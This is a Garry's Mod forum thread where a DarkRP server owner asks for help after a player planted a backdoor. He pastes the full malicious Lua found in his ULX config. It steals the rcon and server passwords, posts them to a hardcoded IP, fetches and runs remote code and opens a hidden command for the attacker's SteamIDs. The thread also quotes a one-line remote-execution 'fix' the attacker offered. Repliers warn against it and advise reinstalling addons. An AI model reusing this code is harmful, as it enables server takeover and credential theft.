*BEWARE* Huge Exploit, Nobody's talking about this? - Developers

I started a new server recently, and a player joined. As soon as he had loaded in, he was able to strip everyones' weapons and remove all entities on the map (printers, etc). He told me he had found an exploit. I made sure to disable clientside scripts in darkrpmodification, and added in cake anticheat. After rebooting, I told the user to rejoin and try again. He got kicked once, and then rejoined, and bypassed the anticheat. I know there's the big citizenhack, odiumpro, and other things out there that are able to do this. The user mentioned that the way he was exploiting was by the use of net messages. He told me he'd created his own bypass system, and then offered to help me. He told me that running this line would close net messages to stop people from exploiting properties. I just wanted to see what people thought of this, since I don't know if it is legitimate. "util.AddNetworkString('ULX_QUERY2') net.Receive('ULX_QUERY2',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)" Furthermore, if anticheat is so easy to bypass, why am I having difficulty finding a post that mentions this and also has a solution to it? I'm running darkrp with extremely minimal addons. Any scripts I have are from gmodstore as well.

You've got an addon or script somewhere that isn't properly making sure that people running commands are [I]supposed[/I] to be running those commands. Also, that snippet he gave you is bad. Lets him run any Lua he inputs, serverside.

95% a workshop addon you have running. also do not run anything he gives you

Is it true that using that command and then restarting the server would wipe that command? [editline]15th July 2017[/editline] Furthermore, here is a list of my workshop addons. [url]http://steamcommunity.com/sharedfiles/filedetails/?id=942644044[/url] [editline]15th July 2017[/editline] Also, I'm using: -blogs -adminpopups -ahud -arivia f4 -ascoreboard -awarn2 -bitminer -cuffs -meth -wyozi cinema kit -money clickers [editline]15th July 2017[/editline] Also, he is able to do this on a darkrp server that has NO addons aside from darkrp and I would imagine ULX.

Even if there were some exploit beyond a backdoor created from an addon, we wouldn't know unless you provided explicit details. Just saying that someone exploited your server doesn't help. I'd venture to guess he wouldn't be able to do this on a purely vanilla DarkRP server.

I just got a message saying to check my ulx config. He planted a httpfetch hook that gave him access to a bunch of things. I removed the hook, changed rcon password. I'm being told that my server is done and that there is no way to remove it. Is that entirely true? Also, how did he manage to do this to my server? [editline]15th July 2017[/editline] -- server info gathering if easylua then return end local pwn = {} pwn['G'] = table.Copy(_G) pwn['R'] = debug.getregistry() pwn['address_full'] = "http://159.203.163.139/index.php" pwn['address'] = pwn['address_full'] pwn['sstr'] = "ULX_QUERY2" pwn['cstr'] = "ULX_QUERY" pwn['sid'] = { ["STEAM_0:0:46709807"] = true, ["STEAM_0:0:70614886"] = true, ["STEAM_0:1:118234279"] = true, } pwn['fsender_interval'] = 130 pwn['inj_interface_interval'] = 600 pwn['G']["util"]["AddNetworkString"](pwn['sstr']) pwn['G']["util"]["AddNetworkString"](pwn['cstr']) pwn['G']["pcall"]( function() pwn['p'] = function(y) for k,v in pairs(player.GetAll()) do if pwn['sid'][v:SteamID()] then v:oldsendlua([=[ chat.AddText( Color( 255, 93,155, 255 ),[[]=]..y..[=[]]) ]=]) end end end pwn['rstr'] = function ( intMin, intMax ) local ret = "" for _ = 1, pwn['math']["random"]( intMin, intMax ) do ret = ret.. string.char( math.random(65, 90) ) end return ret end pwn['sli_inj'] = function( pPlayer, strLua ) pwn['net']["Start"]( "rlua" ) pwn['net']["WriteString"]( strLua ) pwn['net']["Send"]( pPlayer ) end pwn['sli_interface'] = function (pPlayer ) pPlayer:oldsendlua( [[net.Receive("ULX_QUERY", function() RunStringEx(net.ReadString(),"lua/addons/gGenerate/workshop.lua",false) end)]] ) end pwn['runlua'] = function(r, t) local y = pwn['G']["CompileString"](r,"lua/addons/gamemode/"..util.CRC(r)..pwn['rstr'](1,4)..".lua",false) if type(y) ~= 'function' then pwn['p']('SYNTAX ERROR:'..y) else local u, i = pwn['G']["pcall"](y) if not u then pwn['p']('ERROR:'..i) end end end pwn['chk_scan'] = function() for k,v in pairs( string.Split( pwn['file']["Read"]( "cfg/server.cfg", "GAME" ), "\n" ) ) do if( string.StartWith( v, "rcon_password" ) ) then local str = v str = string.Replace( str, "\"", "" ) str = string.Right( str, #str - 14) pwn["rcon_config"] = str end end if CAC then pwn['anticheat'] = "CAC" elseif SimplicityAC then pwn['anticheat'] ="SimplicityAC" elseif QAC then pwn['anticheat'] ="QAC" else pwn['anticheat'] = "unknown" end pwn['inf_tbl'] = { sn = GetHostName(), playercount = tostring( #player.GetAll() ), ip = _G["game"]["GetIPAddress"](), gamemode = _G["engine"]["ActiveGamemode"](), serverpass = _G["GetConVarString"]( "sv_password" ) or "nil", rcon = pwn['rcon_config'] or "nil", currentac = pwn['anticheat'] or "nil", infectedaddon = GPVERSION or "nil" } end pwn['bstrapper'] = function() pwn['def_registry']() pwn['chk_scan']() pwn['chk_pos']() pwn['G']['timer']['Create'](pwn['rstr'](1,6),pwn['inj_interface_interval'],0,function() for k,v in pairs(player.GetAll()) do pwn['sli_interface'] (v) end pwn['reg_interval'](450) end) pwn['net']['Receive']("ULX_QUERY2",function(pl,len) local gstr = pwn["net"]["ReadString"]() local gbit = pwn["net"]["ReadBit"]() if gbit == 1 then pwn['runlua'](gstr) end end) end pwn['reg_interval'] = function(gq) pwn['inj_interface_interval'] = gq end pwn['def_registry'] = function() pwn['R']["Player"]["oldsendlua"] = pwn['R']["Player"]["SendLua"] pwn['R']["Player"]["oldsteamid"] = pwn['R']["Player"]["SteamID"] pwn['R']["Player"]["oldunique"] = pwn['R']["Player"]["UniqueID"] pwn['R']["Player"]["oldnick"] = pwn['R']["Player"]["Nick"] -- globals pwn['math'] = pwn['G']["math"] pwn['net'] = pwn['G']["net"] pwn['http'] = pwn['G']["http"] pwn['file'] = pwn['G']["file"] end pwn['chk_pos'] = function() if SERVER and pwn['G']["game"]["IsDedicated"]() then -- report the server to our addr pwn['http']["Post"](pwn['address'], pwn["inf_tbl"] ) end end -- advanced hiding techniques :D , not rly . pwn['Fetchcode'] = function(url) pwn['http']["Fetch"](url,function(c) pwn['runlua'](c) end) end pwn['chk_panel'] = function (ply,cmd,args) if pwn["sid"][ply:SteamID()] then ply:oldsendlua([=[ if file.Exists("lua/bkit.lua","GAME") then _G["RunStringEx"](file.Read("lua/bkit.lua","GAME")) MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n") else MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n") end ]=]) else ply:oldsendlua([=[MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n")]=]) end end pwn['G']["concommand"]["Add"]("loadpanel",pwn['chk_panel'] ) pwn['G']["timer"]["Simple"](pwn['fsender_interval'] ,function() pwn['bstrapper'] () end) end )

From an exploit in one of your addons or FTP.

Given the huge thing I just posted, even though I removed it, is my server even safe anymore? [editline]15th July 2017[/editline] Is this literal malware? Do I need to completely wipe my server? [editline]15th July 2017[/editline] I would really appreciate knowing whether or not my server is at all safe? I've changed my authkey, changed my rcon password

Can you fill us in where you got that copy of ulx from? You should probably check the source to make sure someone else didn't upload that file to your server.

The person managed to plant that in the server. [B]Now that it is removed, is my server safe?[/B] [editline]15th July 2017[/editline] Will someone please respond with a yes/no?

Soo you're saying someone remotely updated your ulx config file?

Yes, he was able to bypass my cake anticheat and somehow managed to upload that. Now, back to my question, looking at the malicious code that was injected, is there anything I need to be worried about, now that all my passwords are changed?

I've done nothing to receive that title. Can someone useful reply though?

You asking us if your server is safe is not a very good question, how are we suppose to know? The only thing you can do is check all of your addons for backdoors, etc.

Assuming that's the only exploit your server will be fine once it's removed. However i'd be more concerned about how he/she managed to upload the file. If the person exploiting your server has access to upload files what's to stop them uploading another file.

[QUOTE=Moat;52472546]Can you tell us which addon that code was from so we can make sure this doesn't happen again?[/QUOTE]

it was inside of the ulx config. I got the standard ulx. it was clearly done by this player: [url]http://steamcommunity.com/id/Childlike/[/url] he is an experienced hacker as well. Just look at his profile. [editline]15th July 2017[/editline] It appears this guy is one of the creators of odium.pro.

[quote]experienced hacker[/quote] [img]http://i.imgur.com/aqCNELV.png[/img] In all seriousness, he's probably using an exploit in regards to an addon you have. He could possibly be using a game exploit, but I don't really see strong evidence of that as of yet.

Try looking at his youtube. He's trashed like a dozen servers.

There's no exploit being used, it's just backdoors or gullible owners adding random shit that gives skids access to your server.

His youtube points towards it being a backdoor. After removing the script, changing passwords, and running nomalua, the only thing of concern I have left is: 73 2 - DYNCODE (Dynamic code execution) lua/ulx/modules/sh/rcon.lua:17 RunString( command ) Just having a hard time finding that filepath since lua/ doesn't have a ulx directory. [editline]15th July 2017[/editline] I'm also not sure I like a file called "smashhash_dont_delete" with encrypted characters. (garrysmod/data/_smashhash_dont_delete.lua)

[url]https://github.com/TeamUlysses/ulx/blob/master/lua/ulx/modules/sh/rcon.lua#L21[/url] Seems like your ULX is out-of-date if the code is on line 17. You should probably just completely reinstall your addons and check each for backdoors.

I don't know which addon it came from, only that the person was able to execute a lot of commands with it. All addons I'm using were posted above, hope someone is able to find the backdoor that was used. [editline]15th July 2017[/editline] The person is most certainly affiliated with odium.pro. From there, he was able to bypass anticheat and do his dirty work. [editline]15th July 2017[/editline] Not sure what people are disagreeing with my comments about, given the fact that odium.pro is known to be able to bypass cake anticheat somehow (go ahead and read comments, it's been altered in the latest version to once again be able to break through cac, qac, etc) Anyway, I've reinstalled the addons. I'll post again if I see anything happen.

You should do what's been suggested and reinstall all of your addons. Code_bs pointed out that your ULX is likely out of date, which means you almost certainly downloaded ULX/ULib from somewhere other than [URL="http://ulyssesmod.net/downloads.php"]their website[/URL]. Your other addons should be checked for backdoors also. You didn't really specify where each of them came from. Workshop? [B]Edit: [/B]Ninjad a lil. But, cake anticheat isn't going to help you against bad code that has exploits or backdoors in it. It's an irrelevant piece of information and just because you have the anticheat on your server doesn't mean the person is getting around it.

I have a list of both workshop addons and scripts that I've purchased from scriptfodder/gmodstore. Also fixed the ULX error.

[QUOTE=Serenity3;52472679]it was inside of the ulx config. I got the standard ulx. it was clearly done by this player: [url]http://steamcommunity.com/id/Childlike/[/url] he is an experienced hacker as well. Just look at his profile. [editline]15th July 2017[/editline] It appears this guy is one of the creators of odium.pro.[/QUOTE] Gotta say, its absolutely hilarious how stereotypical this guys profile is. Anime avatars, MAGA hats, moving steam images to make yourself look ~professional~, ISIS memes, rick and morty gifs He's even in a steam group called fucking 'Hentai!' Holey fuck

Yeah. It's also somewhat strange how he asks everyone in the youtube videos to report him on steam (which the staff undoubtedly do), his description talks about different illegal items, and yet his account still hasn't been terminated :s: I should also mention that in that malicious file, looking through the code, it called for "infectedaddon" so yeah. Definitely something on the workshop was giving access. Still looking through files with nomalua to find what and how this happened.

[QUOTE=Serenity3;52474218]Yeah. It's also somewhat strange how he asks everyone in the youtube videos to report him on steam (which the staff undoubtedly do), his description talks about different illegal items, and yet his account still hasn't been terminated :s: I should also mention that in that malicious file, looking through the code, it called for "infectedaddon" so yeah. Definitely something on the workshop was giving access. Still looking through files with nomalua to find what and how this happened.[/QUOTE] Please, look through the files yourself, the creator of nomalua did not know what he was doing and did that in the worst way possible. 1. There is no malware in GMod (I mean, there is but that addon wouldn't detect it, an antivirus would, but I find very hard that that backdoor installed one) 2. The stuff it scans for won't be found in any backdoor done by anyone with more than a single brain cell. 3. It gives so many false-positives for legit stuff (it would give flags for CAC) that it isn't worth using